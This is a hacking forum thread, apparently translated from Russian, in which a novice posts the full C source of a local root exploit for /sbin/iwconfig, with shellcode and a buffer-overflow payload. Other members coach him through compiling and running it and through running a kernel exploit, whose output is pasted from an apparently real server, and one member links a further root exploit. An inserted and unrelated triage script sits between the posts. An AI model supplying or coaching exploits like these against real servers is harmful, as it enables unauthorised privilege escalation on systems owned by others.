Root exploit

Discussion in 'Security and Anonymity' started by ~GroM~, 17 Mar 2007.

Thread Status:
Not open for further replies.
  1. ~GroM~

    ~GroM~ New Member

    Joined:
    13 Jan 2007
    Messages:
    27
    Likes Received:
    3
    Reputations:
    2
    Hello, here is an exploit:


    /*
    Name: iw-config.c
    Copyright: !sh2k+!tc2k
    Author: heka
    Date: 11/11/2003
    Greets: bx, pintos, eksol, hex, keyhook, grass, toolman, rD, shellcode, dunric, termid, kewlcat, JiNKS
    Description: /sbin/iwconfig - local root exploit
    iwconfig manipulates the basic wireless parameters

    */

    #include <stdio.h>
    #include <string.h>   /* memset, memcpy, strlen */
    #include <stdlib.h>   /* putenv */
    #include <unistd.h>   /* execl */

    #define BIN "/sbin/iwconfig"

    /* payload placed in the environment; bytes kept exactly as posted */
    unsigned char shellcode[] =
    "\x31\xc0\x31\xdb\xb0\x13\xcd\x80\x31\xc0\xb0\x2e"
    "\xcd\x0\x31\xc0\x53\x68\x77\x30\x30\x74\x89\xe3"
    "\xb0\x27\xcd\x80\x30\xc0\xb0\x3d\xcd\x80\x31\xc0"
    "\x31\xdb\x31\xc9\xb1\x0a\x50\x68\x2e\x2e\x2f\x2f"
    "\xe2\xf9\x89\xe3\xb0\x0c\xcd\x80\x31\xc0\x31\xdb"
    "\x6a\x2e\x89\xe3\xb1\x3d\xcd\x80\x31\xc0\x31\xdb"
    "\x31\xc9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
    "\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd"
    "\x80\x31\xc0\x31\xdb\xb0\x01\xcd\x80";

    int
    main ()
    {
        int x;
        char buf[97], out[13321], *buffer;
        unsigned long ret_add = 0xbffffbb8, *add_ptr;

        /* fill the argument buffer with the guessed return address */
        buffer = buf;
        add_ptr = (unsigned long *)buffer;
        for (x = 0; x < 97 - 1; x += 4)
            *(add_ptr++) = ret_add;

        /* NOP sled with the payload inside it, exported as the OUT environment variable */
        memset ((char *)out, 0x90, 1337);
        memcpy ((char *)out + 333, shellcode, strlen((char *)shellcode));
        memcpy ((char *)out, "OUT=", 4);
        putenv (out);

        /* run the target with the oversized argument */
        execl (BIN, BIN, buf, NULL);
        return 0;
    }
    I compiled it on the server and it built fine; now the question is, how do I use it?
     
  2. gcc

    gcc Elder

    Joined:
    27 Jan 2007
    Messages:
    88
    Likes Received:
    9
    Reputations:
    0
    First of all, you posted in the wrong place; there is a dedicated thread for exploits above.
    How to use it: run the resulting binary =)
     
  3. ~GroM~

    ~GroM~ New Member

    Joined:
    13 Jan 2007
    Messages:
    27
    Likes Received:
    3
    Reputations:
    2
    How exactly do I run it?
     
  4. ~GroM~

    ~GroM~ New Member

    Joined:
    13 Jan 2007
    Messages:
    27
    Likes Received:
    3
    Reputations:
    2
    And one more thing: how do I run this exploit, k-rad3.c? If anyone can help, message me at 924607.
    I run it and everything seems right:

    bash-2.05b$ ./k-rad3 -t 1 -p 2
    [ k-rad3 - <=linux 2.6.11 CPL 0 kernel exploit ]
    [ Discovered Jan 2005 by sd <[email protected]> ]
    [ Modified 2005/9 by alert7 <[email protected]> ]
    [+] try open /proc/cpuinfo .. ok!!
    [+] find cpu flag pse in /proc/cpuinfo
    [+] CONFIG_X86_PAE :none
    [+] Cpu flag: pse ok
    [+] Exploit Way : 0
    [+] Use 2 pages (one page is 4K ),rewrite 0xc0000000--(0xc0002000 + n)
    [+] thread_size 1 (0 :THREAD_SIZE is 4096;otherwise THREAD_SIZE is 8192
    epoll_wait: Invalid argument
    Linux landing.captainserver.net 2.6.8-022stab070.4-enterprise #1 SMP Mon Mar 6 5:28:36 MSK 2006 i686 athlon i386 GNU/Linux
    [+] idtr.base 0xffff4000 ,base 0xc0000000
    [+] kwrite base 0xc0000000, buf 0xbffed7e0,num 8196
    [-] This kernel not vulnerability!!!
    bash-2.05b$ id
    uid=99(nobody) gid=99(nobody) groups=99(nobody)
    bash-2.05b$

    but nothing comes of it.
     
  5. limpompo

    limpompo Newbie

    Joined:
    27 Aug 2005
    Messages:
    1,402
    Likes Received:
    308
    Reputations:
    453
    It already says it right there: Kernel not vulnerability.....
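An added example, not code from this thread or from any of its posters: a POSIX sh triage script that parses a kernel release string such as the 2.6.8-022stab070.4-enterprise one in the output above and compares it numerically with the "<=linux 2.6.11" bound printed in the k-rad3 banner. The function names (kver_num, in_banner_range, is_vendor_kernel, triage) and the sample release strings are constructed for the example. Its point is the one limpompo's reply makes: the host sits inside the banner's version range, yet the tool reports the kernel as not vulnerable, because vendor builds (the 022stab suffix here appears to be a Virtuozzo-series kernel) backport fixes, so a version-string comparison only says where to look and the vendor advisory or an actual patch check decides.

```shell
#!/bin/sh
# Added example for this thread (not code from any poster): triage a kernel release
# string against the "<=linux 2.6.11" bound printed by the k-rad3 banner above.
# Function names and sample release strings are constructed for the example.

# kver_num RELEASE -> integer major*1000000 + minor*1000 + patch
# "2.6.8-022stab070.4-enterprise" -> 2006008 ; "2.6.11" -> 2006011
kver_num() {
    base=${1%%-*}                       # drop the vendor suffix after the first '-'
    major=${base%%.*}
    rest=${base#*.}
    minor=${rest%%.*}
    patch=${rest#*.}
    [ "$patch" = "$rest" ] && patch=0   # "2.6" has no third component
    patch=${patch%%[!0-9]*}             # keep leading digits only ("11rc1" -> "11")
    echo $((major * 1000000 + minor * 1000 + ${patch:-0}))
}

# in_banner_range RELEASE MAX -> "yes" if RELEASE <= MAX by version number
in_banner_range() {
    if [ "$(kver_num "$1")" -le "$(kver_num "$2")" ]; then echo yes; else echo no; fi
}

# is_vendor_kernel RELEASE -> "yes" when a distro/vendor suffix follows the version
is_vendor_kernel() {
    case $1 in
        *-*) echo yes ;;
        *)   echo no ;;
    esac
}

# triage RELEASE MAX -> out-of-range | in-range-vendor-build | in-range-vanilla
triage() {
    if [ "$(in_banner_range "$1" "$2")" = no ]; then
        echo out-of-range
    elif [ "$(is_vendor_kernel "$1")" = yes ]; then
        echo in-range-vendor-build      # backports likely: check the vendor advisory
    else
        echo in-range-vanilla           # upstream kernel inside the range: patch it
    fi
}

# Constructed samples: the release from the thread's uname output plus two controls.
for rel in "2.6.8-022stab070.4-enterprise" "2.6.11" "2.6.12"; do
    printf '%-32s %s\n' "$rel" "$(triage "$rel" 2.6.11)"
done
```

The comparison is numeric per component, so 2.6.8 sorts below 2.6.11 (a plain string comparison would get that backwards), and the vendor suffix is stripped before comparing but remembered for the verdict, which is exactly the case the output above shows: in range by number, not vulnerable in practice.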
     
  6. ~GroM~

    ~GroM~ New Member

    Joined:
    13 Jan 2007
    Messages:
    27
    Likes Received:
    3
    Reputations:
    2
    Thanks. But was I running it correctly at all? And one more thing: how do I use the first exploit?
     
  7. gcc

    gcc Elder

    Joined:
    27 Jan 2007
    Messages:
    88
    Likes Received:
    9
    Reputations:
    0
    Well then: gcc iw-config.c -o iw-config
    ./iw-config
     
    #7 gcc, 17 Mar 2007
    Last edited by a moderator: 18 Mar 2007
    1 person likes this.
  8. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,674
    Likes Received:
    1,029
    Reputations:
    1,228
    ultra-exploit
    http://xpl.jino-net.ru/gcc343prior.c
    gives you uid=0(root) gid=0(root) on almost any server

    [size=-200]crap exploit =\[/size]
     
    _________________________
    4 people like this.
  9. ~GroM~

    ~GroM~ New Member

    Joined:
    13 Jan 2007
    Messages:
    27
    Likes Received:
    3
    Reputations:
    2
    Thanks toxa, you get a plus from me.
     